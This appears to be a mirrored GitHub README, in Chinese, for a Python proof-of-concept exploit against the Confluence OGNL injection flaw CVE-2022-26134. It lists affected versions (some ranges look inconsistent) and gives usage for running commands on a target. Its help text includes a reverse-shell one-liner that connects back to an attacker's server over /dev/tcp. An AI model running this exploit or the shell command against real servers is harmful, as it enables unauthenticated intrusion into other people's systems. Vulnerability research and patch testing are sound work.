Giter Site home page Giter Site logo

keven1z / cve-2022-26134 Goto Github PK

View Code? Open in Web Editor NEW
7.0 1.0 0.0 12 KB

远程攻击者在Confluence未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,在现有脚本上修改了poc,方便getshell。

Python 100.00%
confluence cve-2022-26134

cve-2022-26134's Introduction

CVE-2022-26134

远程攻击者在未经身份验证的情况下,可构造OGNL表达式进行注入,实现在Confluence Server或Data Center上执行任意代码,修改poc,方便getshell。常见端口:8090

影响版本

  • Confluence Server and Data Center >= 1.3.0
  • 7.14.0 <= Confluence Server and Data Center < 7.4.17
  • 7.13.0 <= Confluence Server and Data Center < 7.13.7
  • 7.14.0 <= Confluence Server and Data Center < 7.14.3
  • 7.15.0 <= Confluence Server and Data Center < 7.15.2
  • 7.16.0 <= Confluence Server and Data Center < 7.16.4
  • 7.17.0 <= Confluence Server and Data Center < 7.17.4
  • 7.18.0 <= Confluence Server and Data Center < 7.18.1

使用说明

pip3 install requests

	   ______     _______     ____   ___ ____  ____      ____   __   _ _____ _  _   
  / ___\ \   / | ____|   |___ \ / _ |___ \|___ \    |___ \ / /_ / |___ /| || |  
 | |    \ \ / /|  _| _____ __) | | | |__) | __) _____ __) | '_ \| | |_ \| || |_ 
 | |___  \ V / | |__|_____/ __/| |_| / __/ / __|_____/ __/| (_) | |___) |__   _|
  \____|  \_/  |_____|   |_____|\___|_____|_____|   |_____|\___/|_|____/   |_|  
    
usage: CVE-2022-26134.py [-h] -t TARGET -c COMMAND

CVE-2022-26134

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        目标URL
  -c COMMAND, --command COMMAND
                        执行命令(execute command),get shell:/bin/bash -c bash -i >& /dev/tcp/{vps ip}/{vps port} 0>&1

使用

python3 CVE-2022-26134.py -t [server ip] -c [command] //执行命令

此脚本仅可用于测试使用,勿作他用

cve-2022-26134's People

Contributors

keven1z avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar

cve-2022-26134's Issues

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.